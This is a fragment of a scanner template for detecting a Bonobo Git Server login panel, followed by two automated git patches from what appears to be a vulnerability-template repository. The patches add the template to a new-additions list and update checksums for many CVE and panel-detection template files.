max-request: 2 + shodan-query: http.favicon.hash:-219625874 + tags: panel,bonobo,git,login,detect http: - method: GET From 2b15e7904282f9b7f35031c42c3d551952951982 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 23 Apr 2024 13:28:56 +0000 Subject: [PATCH 0284/1768] Auto Generated New Template Addition List [Tue Apr 23 13:28:56 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 2c67b57228..3deca2160a 100644 --- a/.new-additions +++ b/.new-additions @@ -1,2 +1,3 @@ http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml +http/exposed-panels/bonobo-server-panel.yaml http/exposed-panels/tixeo-panel.yaml From 94fc8fa694b88e8b24c7715eeff595c6dd55e9ca Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 23 Apr 2024 13:29:06 +0000 Subject: [PATCH 0285/1768] Auto Generated Templates Checksum [Tue Apr 23 13:29:06 UTC 2024] :robot: --- templates-checksum.txt | 119 +++++++++++++++++++++-------------------- 1 file changed, 60 insertions(+), 59 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 823d3342b1..8786b67e60 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -211,7 +211,7 @@ dast/vulnerabilities/xss/dom-xss.yaml:397dd3f854c47a0aadd92ad3a9fc93aa77ec5253 dast/vulnerabilities/xss/reflected-xss.yaml:1faff32e9ad4bb73f0476c526f9b6ef6d5a51757 dast/vulnerabilities/xxe/generic-xxe.yaml:54b04c0c3b8d50d6305ed48ac7997f1aeeea426d dns/azure-takeover-detection.yaml:34e8e8a0db3e2ff7af0bf8df8ee9c54f2ee8e3b4 -dns/bimi-detect.yaml:95573c77b3b3fc8814623c03d23781b3f33d1e03 +dns/bimi-detect.yaml:49b1f8b7289261ba3926483a41fa213f921248f2 dns/caa-fingerprint.yaml:71845ba0a32b1968e23b507166275ee4c1f84b24 dns/detect-dangling-cname.yaml:0c5204f22465c8ebb8ae31e6265ffa5c0cd4b6e2 dns/dmarc-detect.yaml:d60f87ac8a617c0496d558269abd50389bbb1b37 @@ -843,7 +843,7 @@ helpers/wordpress/plugins/yith-woocommerce-wishlist.txt:d2728a246c4129a45f2985f6 http/cnvd/2017/CNVD-2017-03561.yaml:79260d0e646db6519b46802fac2d8ec8589d1ba2 http/cnvd/2018/CNVD-2018-13393.yaml:e365c4cc3cecc4451e7c34a6981ab065564b97cb http/cnvd/2019/CNVD-2019-01348.yaml:00039f3ad05b482affa479dab2872b59519edae9 -http/cnvd/2019/CNVD-2019-06255.yaml:ac3fbcbb61b65740aab093a0352bc94e2064a2eb +http/cnvd/2019/CNVD-2019-06255.yaml:177b4595e92f65baec0c9ab8a1aa5c544ef438e6 http/cnvd/2019/CNVD-2019-19299.yaml:cd50ea5ec3feef05ce24f3cc0156675d3c9c975e http/cnvd/2019/CNVD-2019-32204.yaml:cebac2aca6a77c5ec79483cbdc162c22c158bd7e http/cnvd/2020/CNVD-2020-23735.yaml:ad6eb9158cab78f80ed0a048f4e63b56890d46fd @@ -868,7 +868,7 @@ http/cnvd/2021/CNVD-2021-32799.yaml:2040dd5a60d1a100d83a32c393ddca9297424559 http/cnvd/2021/CNVD-2021-33202.yaml:456cb1010d88aa9d66fe49b798317401e910bba4 http/cnvd/2021/CNVD-2021-41972.yaml:49971c05dd60e8d14f8d2c7eb92cdad18f62d3b4 http/cnvd/2021/CNVD-2021-43984.yaml:e6c70dfee97d7b8446455c82c402305c19a27a73 -http/cnvd/2021/CNVD-2021-49104.yaml:4f7a7510def263daccadbda0df63251a7296fa3f +http/cnvd/2021/CNVD-2021-49104.yaml:f766f0c4ece9bdf09fb8ca471323937485dce9c3 http/cnvd/2022/CNVD-2022-03672.yaml:f4d4974170f405875cfc0cd6f61574e1a39b2772 http/cnvd/2022/CNVD-2022-42853.yaml:3a6672aeea87cae4f92e10b0c2502fb5f367967d http/cnvd/2022/CNVD-2022-43245.yaml:5517d85329dd0ed3f1e7ad377a975304030ce66b @@ -1076,7 +1076,7 @@ http/cves/2012/CVE-2012-0981.yaml:60fe3af545af85bc25ab4fd527333593d3bdd45e http/cves/2012/CVE-2012-0991.yaml:6066f351faa5e380c9624693e9909aa24b6aedac http/cves/2012/CVE-2012-0996.yaml:b19ab38ebefec4aadd598937841d93b4d33f09ee http/cves/2012/CVE-2012-1226.yaml:2c3128c37cb7cb9ba8ef97b9776c311191445a58 -http/cves/2012/CVE-2012-1823.yaml:dcd99178fac787423ca15994c40dec95b149d259 +http/cves/2012/CVE-2012-1823.yaml:0d3dd8a773dce48c30843ad44a58921844f7445b http/cves/2012/CVE-2012-1835.yaml:a8e5a8464a31bace69bb1ad4d7af5fa733f76cd7 http/cves/2012/CVE-2012-2371.yaml:cf289b04f6825c98b1648a45082759e50eafd7da http/cves/2012/CVE-2012-3153.yaml:9632dbed943428a3ce82bd26243e96bb53e0101f @@ -1352,7 +1352,7 @@ http/cves/2017/CVE-2017-5631.yaml:da5852f436aefece302a1795b05e028153ab7b30 http/cves/2017/CVE-2017-5638.yaml:065653ee455cb2dee7baa8690bd3dd5835cd14d4 http/cves/2017/CVE-2017-5689.yaml:7e2c312474c7166e2af89aab6323de72d9e6c5d7 http/cves/2017/CVE-2017-5982.yaml:2cc9e80970cd0d0f3fddf4e79b615e8f80f945be -http/cves/2017/CVE-2017-6090.yaml:3b5297375be9f7e743211eb176f08c3c01d21255 +http/cves/2017/CVE-2017-6090.yaml:b28b3e28c0d52c2ee367c9c78b2ad913f0949d6b http/cves/2017/CVE-2017-7269.yaml:9e313436b09e4f8ae88a198f58760f9a55373578 http/cves/2017/CVE-2017-7391.yaml:e25d7a726fa44b926c005349fe3b65d9a3e1794f http/cves/2017/CVE-2017-7615.yaml:4a3e9b8299a0258fedc1a737b810f61719302640 @@ -1369,7 +1369,7 @@ http/cves/2017/CVE-2017-9791.yaml:00efcf8bf37fe77ed2534d335bf4e86f540593ac http/cves/2017/CVE-2017-9805.yaml:4fe5223d9747e0cd6872564b8069d1d2074a8fdc http/cves/2017/CVE-2017-9822.yaml:137875cd55de914baf6ad6cca7783b728484715c http/cves/2017/CVE-2017-9833.yaml:c08b62014c13f6adbdf1b39fb6199d35f4df773c -http/cves/2017/CVE-2017-9841.yaml:acb8dd068e703498d409000af76edf6694764532 +http/cves/2017/CVE-2017-9841.yaml:b17dc781f051451822729dad1584ffc0a690d41a http/cves/2018/CVE-2018-0127.yaml:b45c016b95763662a90197111431384d3c845e21 http/cves/2018/CVE-2018-0296.yaml:8f811f713bd26781e42619b8ad3cdc084297b52c http/cves/2018/CVE-2018-1000129.yaml:03328d29e7ad3ec82f00b8de687d940ec9060db9 @@ -1721,7 +1721,7 @@ http/cves/2020/CVE-2020-11798.yaml:d9e0f98c88d58160585123f986858af68e699b2e http/cves/2020/CVE-2020-11853.yaml:c5d11eb79e634cb7a91088fe76160f639712d927 http/cves/2020/CVE-2020-11854.yaml:83b8968272ec2cd44a13434ee02a7d4a16128622 http/cves/2020/CVE-2020-11930.yaml:4d997b58dee0b035f39ea9d3589c7a141cab7e42 -http/cves/2020/CVE-2020-11978.yaml:f684abe27ca1da54466596d7050ba381a4f2dcb5 +http/cves/2020/CVE-2020-11978.yaml:447d6b42a9d09489934f3c2389db422764017885 http/cves/2020/CVE-2020-11991.yaml:3314b276c640c526eb12fcc56a4512066647df6c http/cves/2020/CVE-2020-12054.yaml:0e9a43f56fe26a1d1a99d6100ebca7dc136b9cf6 http/cves/2020/CVE-2020-12116.yaml:abb9cf66f2277f40b0946dbb7832c9260bb3bc15 @@ -1859,7 +1859,7 @@ http/cves/2020/CVE-2020-28185.yaml:f1febab1b85d4233b3e72aa0d2719fa95708c8a6 http/cves/2020/CVE-2020-28188.yaml:7b8274a1d7744a0a3751bdbbad8bf018231c9f67 http/cves/2020/CVE-2020-28208.yaml:572cd573f91a14a49aafbe46ba917ab4fb22ad8d http/cves/2020/CVE-2020-28351.yaml:16f3808bf7037eee165ff817b9032b07cff97715 -http/cves/2020/CVE-2020-28871.yaml:90deddc76ccebd1e25cc0400a6eb7c92be129481 +http/cves/2020/CVE-2020-28871.yaml:86f474bb8d7bf2e7681e261a4b18a4f3d5dde805 http/cves/2020/CVE-2020-28976.yaml:598019c32cb4b0e55d77f7c45f1ba39593debba3 http/cves/2020/CVE-2020-29164.yaml:78b7cbf695b31728ea725272c47836d48e8d9c1f http/cves/2020/CVE-2020-29227.yaml:7aae495d9f31d8b89aa729114fc84b8ec90b261e @@ -2008,7 +2008,7 @@ http/cves/2021/CVE-2021-22873.yaml:5beb5f7420b748951d79cb8fbac8a27fc281488a http/cves/2021/CVE-2021-22911.yaml:048be356528c7c29a31ac1ac3281292f1b07c0ba http/cves/2021/CVE-2021-22986.yaml:06a290cbb4d4bafb585a68270201fe178561c9e2 http/cves/2021/CVE-2021-23241.yaml:e1888868bf2770805a3f0cb3cae6820883bf9754 -http/cves/2021/CVE-2021-24145.yaml:32e3a0544a8564138835a92fb7ac771b6f228399 +http/cves/2021/CVE-2021-24145.yaml:a82b4e67bfbd496b6ce1b0d8378f81dacd5a0af2 http/cves/2021/CVE-2021-24146.yaml:30f30afaad0e48ad7394e8f3bc658e3c52ea375d http/cves/2021/CVE-2021-24150.yaml:bc46ae35079f405b539824e978457a5726b272ed http/cves/2021/CVE-2021-24155.yaml:fc725c5de1693bf4594d37b2b83d936127f2ff94 @@ -2021,7 +2021,7 @@ http/cves/2021/CVE-2021-24215.yaml:fd49e8ca44ef839c651006537212074a832aeafc http/cves/2021/CVE-2021-24226.yaml:e3cce68f878058a5b883337446b715c4638ea5b2 http/cves/2021/CVE-2021-24227.yaml:d825309df0abf4a54318fc13a1fa1ffb0896caaf http/cves/2021/CVE-2021-24235.yaml:57c461d4f1161b23cc0275237347f99886ee2245 -http/cves/2021/CVE-2021-24236.yaml:34b917c91dc09b3fe7e69bb8fef28a5a63c98aa7 +http/cves/2021/CVE-2021-24236.yaml:b23f084964832d51ab3f4af593232ecdde5e6586 http/cves/2021/CVE-2021-24237.yaml:ee414764403594d1eb17e3c75248f7981be30647 http/cves/2021/CVE-2021-24239.yaml:3ba11b811447f546d379ae433df958844f08df7b http/cves/2021/CVE-2021-24245.yaml:7bb1fc8f1f066614f4acc1287336318999c2b9ab @@ -2029,7 +2029,7 @@ http/cves/2021/CVE-2021-24274.yaml:fdc8b3c848faeec90768ba04b9afd444ada6ed29 http/cves/2021/CVE-2021-24275.yaml:d1acccef3badf246eeb435791fd2b6f5a226f539 http/cves/2021/CVE-2021-24276.yaml:5b68df559fa465a4f8e22f0166773c8a8d53f469 http/cves/2021/CVE-2021-24278.yaml:7837831aa12b4bb256ff897217417829bf146f1c -http/cves/2021/CVE-2021-24284.yaml:b5cdb8dedfad21c2d737ce0d7ab8b60b91a070e9 +http/cves/2021/CVE-2021-24284.yaml:8e0a2d867fefe5278478906204c54407d2c52981 http/cves/2021/CVE-2021-24285.yaml:7be3795857e1e167e9cadb6ba89f1404ceedd3db http/cves/2021/CVE-2021-24286.yaml:feed87a979080f2b9a28d592ceace161b1f5fffd http/cves/2021/CVE-2021-24287.yaml:b226b9989d0add703e9f949168ac27a5f4063f96 @@ -2060,7 +2060,7 @@ http/cves/2021/CVE-2021-24472.yaml:619b8e42c91130942587995b934b9f6cc591faee http/cves/2021/CVE-2021-24488.yaml:f3a1efac3aee6f4c0a616e2c24eb9b422c05f159 http/cves/2021/CVE-2021-24495.yaml:a12f27c95cce7beea89646d84b37f514056883cd http/cves/2021/CVE-2021-24498.yaml:19c1037c1be634ce077d5e4bacc4eb8de8eff0bc -http/cves/2021/CVE-2021-24499.yaml:8f6c4929bb9a315832571845343417bd9ae087d1 +http/cves/2021/CVE-2021-24499.yaml:479ae56097144603aa0ac425b482797071c148a0 http/cves/2021/CVE-2021-24510.yaml:8c7148382e6ee611f343cf28583c3bb7b4e0ee7a http/cves/2021/CVE-2021-24554.yaml:d81b4b96eb5938723fef5c8b4ff3c6b714601a31 http/cves/2021/CVE-2021-24627.yaml:430e5307771ec9c27cfbd2e8cd9850414e7aff0f @@ -2245,7 +2245,7 @@ http/cves/2021/CVE-2021-35464.yaml:2cda8ca7381e839590c5b17e483262fde71bf415 http/cves/2021/CVE-2021-35488.yaml:ad79addd0f52f8c6e3fef3121e04e2bdfcf3dc35 http/cves/2021/CVE-2021-35587.yaml:e7afa55d4e91320829d4b282717c4f43e9294591 http/cves/2021/CVE-2021-3577.yaml:704b09c1177c35ce4c5f70fbe04bcdb1950f3d01 -http/cves/2021/CVE-2021-36260.yaml:5da92bad53429f1916af486bc172a4154b44b80f +http/cves/2021/CVE-2021-36260.yaml:5c3d7e011562cc9e0ce4444d458c9eb32703afaf http/cves/2021/CVE-2021-36356.yaml:695cae6079d51b30ad4ce06ebe0aefc2ef6684d2 http/cves/2021/CVE-2021-36380.yaml:471575f635d42fe0c7d4dc85f0968af7d252ff1c http/cves/2021/CVE-2021-36450.yaml:0ab298502a0faa1d6021749a8c4c6da0b2008f35 @@ -2297,7 +2297,7 @@ http/cves/2021/CVE-2021-40822.yaml:cd334eabdae2efe8dba8e13de1ad9022c2683ed1 http/cves/2021/CVE-2021-40856.yaml:4aadf3d80dd73b612020a8d1ca20c5111201a957 http/cves/2021/CVE-2021-40859.yaml:a8a6ab85fce3e1aab3d083ea9f6e20657d55a958 http/cves/2021/CVE-2021-40868.yaml:ad6add8c1267887bc3a86a8a1a010d32abf4a5ac -http/cves/2021/CVE-2021-40870.yaml:c3203d213da3811f7c538bf420a2fe0bbd64315c +http/cves/2021/CVE-2021-40870.yaml:842124570baf16773a52fe3d69d8a5a05259ae52 http/cves/2021/CVE-2021-40875.yaml:f0fe555e8f66c1c6ff93f5bfaf55dd364a945efc http/cves/2021/CVE-2021-40908.yaml:33321e29227bca645ee3c7ce9350fa3e6795ea11 http/cves/2021/CVE-2021-40960.yaml:0da341f855c1b922e90c84d04bd50f6b10c66eb9 @@ -2517,7 +2517,7 @@ http/cves/2022/CVE-2022-1916.yaml:c49dfcef4c446dc595f69fc553a3ac2a70461b5c http/cves/2022/CVE-2022-1933.yaml:698dc72c8292ca8e6b7d5b7c52c9a8ea39407718 http/cves/2022/CVE-2022-1937.yaml:7e5f553c9ebe4b5a0945822af6c31a8efb8def26 http/cves/2022/CVE-2022-1946.yaml:982f4f9519b1a137a8d2f2c71c7f2225cb67da1d -http/cves/2022/CVE-2022-1952.yaml:c75d766e8d66c563666248214e9872f7abc936eb +http/cves/2022/CVE-2022-1952.yaml:94de725f4880107f8c58454b17b55f6e934d94bf http/cves/2022/CVE-2022-2034.yaml:e6a1b542f667903a5f16aca40d8940497e933818 http/cves/2022/CVE-2022-21371.yaml:e9b20049b90afecb519db58387e5922047ef5944 http/cves/2022/CVE-2022-21500.yaml:09c47788ed23dac1444cc160ed94c32c30d492d9 @@ -2540,7 +2540,7 @@ http/cves/2022/CVE-2022-22965.yaml:ef5b9d4d0ee4294bb2924a8191e4b9f50844ab5f http/cves/2022/CVE-2022-22972.yaml:20ae7ffa9fc7e4a84f4244d0f60c34e1ba888104 http/cves/2022/CVE-2022-23102.yaml:2c0601f1c235f0ace6e9cce546c8e1eac687dee0 http/cves/2022/CVE-2022-23131.yaml:648768e33c0a8a843f54452a00e671eca3ee5f55 -http/cves/2022/CVE-2022-23134.yaml:ec49525590d1c5161a4c7f417fb60927299cc792 +http/cves/2022/CVE-2022-23134.yaml:dd7f8ab346a265af3e5fc1eebfdfeb3f87b002ba http/cves/2022/CVE-2022-2314.yaml:e36aa03da886dca014a29f2bafa939215c4fa5c7 http/cves/2022/CVE-2022-23178.yaml:f8a6eabd1cfb10a524974bcbe7dc56161a20b314 http/cves/2022/CVE-2022-23347.yaml:d5c0b7111ebb6fcb47d32369acbc46967d10491e @@ -2595,7 +2595,7 @@ http/cves/2022/CVE-2022-2546.yaml:111eb19fb05e02dedbe9dfa8ac5c3111bb7e9632 http/cves/2022/CVE-2022-25481.yaml:668c890131118e3551f9f7092ce4c99c9703f848 http/cves/2022/CVE-2022-25485.yaml:3674f5ab31f186d55843c550fc1e3409ab9dc652 http/cves/2022/CVE-2022-25486.yaml:de285c467f5f02814968f009f996a7eaf817d3e4 -http/cves/2022/CVE-2022-25487.yaml:d44851d6ddc2b056f246cbf858923b246c131db2 +http/cves/2022/CVE-2022-25487.yaml:5d7eae5a1df0f4c7a9951eedbfbd9eac49bda7f6 http/cves/2022/CVE-2022-25488.yaml:a4ae57601c63399470b7d427a5f33f504cac8c1d http/cves/2022/CVE-2022-25489.yaml:2d1a90be1e6bd0d2f9544b737b2b586c6d2f845c http/cves/2022/CVE-2022-25497.yaml:c19182294ccffa0cdbb718292f70e8abd19d0dce @@ -2764,7 +2764,7 @@ http/cves/2022/CVE-2022-39195.yaml:9722f574507425682ebbfa2ea2e59ced9dd02234 http/cves/2022/CVE-2022-3933.yaml:8bdf9fc2cc672a6ceeadc95a0bb890ab17396398 http/cves/2022/CVE-2022-3934.yaml:e1abcd7b986d2f3622f65200fdc1412374c8f640 http/cves/2022/CVE-2022-3980.yaml:c62703eafccdacebfa34726173c9016f2ebb689f -http/cves/2022/CVE-2022-3982.yaml:a1a2aa637e01649a02862fee71134491230e5f8d +http/cves/2022/CVE-2022-3982.yaml:2d24d96db546b8f6a767a34887bb9bdc2b121c8c http/cves/2022/CVE-2022-39952.yaml:5faef9501aa8d2570eb32f70d443978e08c4b420 http/cves/2022/CVE-2022-39960.yaml:149945d07d1a3885428826ef82731d610c0396eb http/cves/2022/CVE-2022-39986.yaml:8d52d2c613445e9f49cb6aacecf0f7a868a22b54 @@ -2820,7 +2820,7 @@ http/cves/2022/CVE-2022-43185.yaml:0cbd64852901d1554d6da492ab83635216c3be07 http/cves/2022/CVE-2022-4320.yaml:85df1be119e20f7dd54ec90fe4f29813ec89fc90 http/cves/2022/CVE-2022-4321.yaml:18451ef7ed2083de058c2fc773cd4c0df5a2b383 http/cves/2022/CVE-2022-4325.yaml:f186020c216cd067428f78142dc9637ac51c3ec8 -http/cves/2022/CVE-2022-4328.yaml:2421ea8a1b4ea738ee7082f06e751ffc4226d240 +http/cves/2022/CVE-2022-4328.yaml:027d49a96bd49b38b06c63fe56e85df269c0af27 http/cves/2022/CVE-2022-43769.yaml:c6a4115aa490d6bea5d94d4fd5313fafebf2ba56 http/cves/2022/CVE-2022-44290.yaml:c603b4cdf73c9b70df220546fb645d454fbfd368 http/cves/2022/CVE-2022-44291.yaml:50e4b9fef3f63a6f1166f23761c05ecea1412bbb @@ -2963,8 +2963,8 @@ http/cves/2023/CVE-2023-26255.yaml:72ba0cb106a848cbf4550abb5e379601fc8d57c7 http/cves/2023/CVE-2023-26256.yaml:235515a1f0e49888d8e059097494109563de4d3f http/cves/2023/CVE-2023-26347.yaml:e2a80f4ae72176cbd3d0b523754f551888e7bbda http/cves/2023/CVE-2023-26360.yaml:9ae6adc24876a9f0e6eba59879e0cb520015d0c1 -http/cves/2023/CVE-2023-26469.yaml:e556f4155b494aa5f4026402e100b27f9a5b00e8 -http/cves/2023/CVE-2023-2648.yaml:a4749d17c74a4663593d16a1ab53389b4988698d +http/cves/2023/CVE-2023-26469.yaml:fef5e0a0a6c5d3fb658813db3402193eb13a9711 +http/cves/2023/CVE-2023-2648.yaml:41ec7f7a05226cc4b5805c7b3018d5d492f21343 http/cves/2023/CVE-2023-26842.yaml:a8e888fe71856500458f993a7623c95a5acf2d34 http/cves/2023/CVE-2023-26843.yaml:a29e22aabb4f3c623854b0e2f79c6aaba42bd323 http/cves/2023/CVE-2023-27008.yaml:99b72f80285fcea1ca809221940b6dd32a511432 @@ -3030,7 +3030,7 @@ http/cves/2023/CVE-2023-32563.yaml:3ac13df7389a44c872cfc4bb0916de89c6912b40 http/cves/2023/CVE-2023-33338.yaml:64557689950914621e4b59c37bab423ac5ad636a http/cves/2023/CVE-2023-33405.yaml:fd578aece75fa256b7e9d6fbfd1d5beac0ac400c http/cves/2023/CVE-2023-33439.yaml:6833de5b8a09afccde10c5b536eef39c01a431f2 -http/cves/2023/CVE-2023-33440.yaml:ee11e5ebcd2c659a0dc1ba9ba947e31493849802 +http/cves/2023/CVE-2023-33440.yaml:80e2c509f89e2ff0b83e6b8d548a3d4bf4eeb2e0 http/cves/2023/CVE-2023-3345.yaml:2c12dba415df031f2c8e2718b5e3a7e7927a89c4 http/cves/2023/CVE-2023-33510.yaml:a280edbd1c1acfede9382deb4138cb4494733edc http/cves/2023/CVE-2023-33568.yaml:1ad32800fd0219a8f89f6064e3fce39880d56f29 @@ -3062,13 +3062,13 @@ http/cves/2023/CVE-2023-35082.yaml:d2427695775bc0a2185c5ddb96592e59c0a6e7ae http/cves/2023/CVE-2023-35813.yaml:d839cb403eac854901b27fa2fef557ce243631dd http/cves/2023/CVE-2023-35843.yaml:f935ab47792f5daffb747a60564df573aea5b874 http/cves/2023/CVE-2023-35844.yaml:07feb73ed36aeaec344d8b1998c70aee8f8d9bd9 -http/cves/2023/CVE-2023-35885.yaml:cbf52581428c38ffdb91d1400d21519f2f33d9df +http/cves/2023/CVE-2023-35885.yaml:957a28f9f3f996307f32ae59a9f525b604092de2 http/cves/2023/CVE-2023-36144.yaml:152d855d93a2f729ac8765c3860a38fba7020624 http/cves/2023/CVE-2023-36287.yaml:95776d1420538a12d408f6ccd81aa83dc7d21a12 http/cves/2023/CVE-2023-36289.yaml:3d52b899da5c618c6e22f6d189e9be7ec5008206 http/cves/2023/CVE-2023-36306.yaml:3251b16b3918faf9a3c2ca2b070c0f205fc36e75 http/cves/2023/CVE-2023-36346.yaml:f524b20cf9dd61d63ba55a26895e1218ade1920b -http/cves/2023/CVE-2023-36844.yaml:2be623b8166452964679e3ed21d5db41f4b8d5fe +http/cves/2023/CVE-2023-36844.yaml:adfddfa1ab5dd5cc0211d46e682bc1cc9952c672 http/cves/2023/CVE-2023-36845.yaml:c45751eb7a407e412cf60b85d55ec83cde5d3259 http/cves/2023/CVE-2023-36934.yaml:ccc28db870aa6f0010d0598e3a5300771ad902ef http/cves/2023/CVE-2023-3710.yaml:b2be8a781103b6505a95ec075e384c01ca46d9cf @@ -3078,7 +3078,7 @@ http/cves/2023/CVE-2023-37270.yaml:7021ddf67a9a7d0e223fd0058f39f9d9d93ee50d http/cves/2023/CVE-2023-37462.yaml:e95ff52904870987f3f2724849653753f3004ca5 http/cves/2023/CVE-2023-37474.yaml:1382e6f8734c475fdfa9ac81718c3240fbb2153a http/cves/2023/CVE-2023-37580.yaml:05c627b76d0ee6c8933ae7718273170cb1d01328 -http/cves/2023/CVE-2023-37629.yaml:cf182b0354fafda2f0061d4fd320eb5ff1d7beff +http/cves/2023/CVE-2023-37629.yaml:1c11ce54a7c84be5200d518fd211de5122cef10d http/cves/2023/CVE-2023-3765.yaml:fe25e60403d8d565e54e667bfa00fa3bec54380e http/cves/2023/CVE-2023-37679.yaml:4b98e576c7009ac3b16b275285e047004ba4c40d http/cves/2023/CVE-2023-37728.yaml:95a98690b4984e97751535c02f678dd53be471dd @@ -3154,7 +3154,7 @@ http/cves/2023/CVE-2023-45542.yaml:8a9af0dceceac9809c1a2971d0600b81071ec0f2 http/cves/2023/CVE-2023-45671.yaml:dd4754dca2d4d037d911c6a7200d2a83cd81bbcf http/cves/2023/CVE-2023-4568.yaml:ac29d0a7a3e2214d9787a1d7faaee8ed2ff12d06 http/cves/2023/CVE-2023-45852.yaml:121fe7235b0b17c24564aabf8701636466e6c686 -http/cves/2023/CVE-2023-4596.yaml:38a9424a67e68fef626b9fc4fcbdbd464f83cffc +http/cves/2023/CVE-2023-4596.yaml:2f579cfedfcc066453d4d03b303efa1505fcc2cb http/cves/2023/CVE-2023-4634.yaml:a27a590c0501711f8c63e214ca7d76c1b3e7bef1 http/cves/2023/CVE-2023-46359.yaml:2c5eadff5358c49c151934a282621b2bfce3bf92 http/cves/2023/CVE-2023-46574.yaml:3ee23f056a218c79387d3ae1c3cdbb51aeba5191 @@ -3181,7 +3181,7 @@ http/cves/2023/CVE-2023-50968.yaml:bab623e4b6cb88b943b91d6825d34d007503754b http/cves/2023/CVE-2023-51467.yaml:9878c789d7c85882dd19de5043facfc96af7ea1e http/cves/2023/CVE-2023-52085.yaml:aa1fc00f87c229fda933d8738697fe6899c791ec http/cves/2023/CVE-2023-5244.yaml:32f7df605dda4c16610c548f773673f5b69c67a5 -http/cves/2023/CVE-2023-5360.yaml:4877ba4e6248f7ebbb3176a71c7508b873487a2f +http/cves/2023/CVE-2023-5360.yaml:2ab7c61990737a8776592831e8189ff751935ab9 http/cves/2023/CVE-2023-5375.yaml:1a1f06afcd795e901f9320cb7eafed3583078598 http/cves/2023/CVE-2023-5556.yaml:39a19e3bf6a7d46ee8f9d2550dfe7ed8f3ba2413 http/cves/2023/CVE-2023-5830.yaml:7e762d6ffa5d98900695ddf94f70b095cd54ee62 @@ -3229,7 +3229,7 @@ http/cves/2024/CVE-2024-22024.yaml:8f8fbb852668db0a337fbc6e9046e4a05c458be1 http/cves/2024/CVE-2024-22319.yaml:089e73d8633f14ef54b24a562f3c6a81e7e85b2d http/cves/2024/CVE-2024-22320.yaml:161fb9579017c222d6792c1dcc6a9223edecdcdb http/cves/2024/CVE-2024-23334.yaml:c7735b96c11cb5fb87ede7ad978c21a2e2bb2bbe -http/cves/2024/CVE-2024-2389.yaml:47e1eb7dc5f548c1973053d65d3c49dd6a0b0c93 +http/cves/2024/CVE-2024-2389.yaml:6fa69f07abbcfc935f223d3196bcfafc693c1c07 http/cves/2024/CVE-2024-25600.yaml:8703f79b48f50eb0dd4943c889a17f8e264e8c05 http/cves/2024/CVE-2024-25669.yaml:970b706816344e71cfc971f7e2b69be44296cd81 http/cves/2024/CVE-2024-25735.yaml:f7694e6ddea1f334810c1f92161b65fe17c5881c @@ -3245,7 +3245,7 @@ http/cves/2024/CVE-2024-2879.yaml:b49dbdd0903b4812334dfdb5d99c2c128b750841 http/cves/2024/CVE-2024-29059.yaml:e58644b7fabb2b313e0232a6d9eaffbebb7f498a http/cves/2024/CVE-2024-29269.yaml:c36e5f4c5cebb6a3a60a4c5228dd5a823482e8cc http/cves/2024/CVE-2024-3273.yaml:ba09cef76e7e1002ae6d72d3d9b670f09562ca9b -http/cves/2024/CVE-2024-3400.yaml:c3e4db2d654a91d57c76b589093fde63f97cb7db +http/cves/2024/CVE-2024-3400.yaml:bcfc68b17ac852e46c39e29ea64fefca3401b61c http/default-logins/3com/3Com-wireless-default-login.yaml:7c816fc8c0b14d7f9c5b111259ca75c4f96a4671 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda @@ -3549,10 +3549,11 @@ http/exposed-panels/black-duck-panel.yaml:97036b3895473e3fa390f4560ca2bcd9922087 http/exposed-panels/bloofoxcms-login-panel.yaml:5864e8cac795cb77a526df3d0fb7a2e8321643b8 http/exposed-panels/blue-iris-login.yaml:de1cdc950985e02dcf3602e6323491e211e0a0e2 http/exposed-panels/bmc/bmc-discovery-panel.yaml:b772c8320a2bf73d41c3818cf153a62f80cc0b7b -http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml:f0d800c9fe790efca0d66099b4380243202609ab +http/exposed-panels/bmc/bmc-remedy-sso-panel.yaml:307d5cbedb061940908186431518606eb422fa33 http/exposed-panels/bmc-panel-detect.yaml:58bb1fc9aecb78435cfdfd60bd77eafad0cab7d0 http/exposed-panels/bolt-cms-panel.yaml:43b47b64f902654a3cca0ed56c18721974b03f07 http/exposed-panels/bomgar-login-panel.yaml:4a3abfc3af8fbb6a7cdc1a013aef84451e2b8797 +http/exposed-panels/bonobo-server-panel.yaml:823d6e139da52c3f38805f7e1d8bc8123a88b422 http/exposed-panels/bookstack-panel.yaml:6aa200c15b16ebfaa41c6ede6c814ccae56115fb http/exposed-panels/buddy-panel.yaml:612c814fabd73cab9fbcabc30169454db23c583b http/exposed-panels/buildbot-panel.yaml:c61b26d17d36adafb7f6642b12d64078e3aebc15 @@ -3648,7 +3649,7 @@ http/exposed-panels/cpanel-api-codes.yaml:a26ac3c4c4cb3e32b40376f94d2d4cd90387ea http/exposed-panels/craftcms-admin-panel.yaml:ad84bef6e6da1edf763aad80aaa6de3a91d2f395 http/exposed-panels/creatio-login-panel.yaml:be251ed8449b36fffd157869473e9d02d523f573 http/exposed-panels/crontab-ui.yaml:7504a353c3dc9824fefa0aae8181f1d1432e8ed9 -http/exposed-panels/crush-ftp-login.yaml:938c5817268213ccffcc9103766197d511cec092 +http/exposed-panels/crush-ftp-login.yaml:fd6d8e7854c0b21aefe3ccd2c888a28e5605a996 http/exposed-panels/crxde-lite.yaml:65ed3b8bdac70ea67b50f46dc919ba9618f6794c http/exposed-panels/cryptobox-panel.yaml:331a79e499fa5b98536dd6cb4dc72949a6110419 http/exposed-panels/csod-panel.yaml:52cb0acb09040a3d634c9ccae3f2d73bcb83333b @@ -4372,7 +4373,7 @@ http/exposed-panels/tibco-spotfire-panel.yaml:7abc1e8affa4065623831a8dfa9ebcc5f3 http/exposed-panels/tigase-xmpp-server.yaml:75dcbfb91190aa716fb8894a26fad88ebcf1c4b4 http/exposed-panels/tikiwiki-cms.yaml:704f538632b5890953ff4ee1550305c9b6f9bcc4 http/exposed-panels/tiny-file-manager.yaml:5227b4eaf964e71cb70ca203584d07e6abfcb4d9 -http/exposed-panels/tixeo-panel.yaml:ad42fb52d0ad6ea37b0f3772377656437f11d1a5 +http/exposed-panels/tixeo-panel.yaml:c4d4bdf1928f96106840072e7921b6914df9b2d1 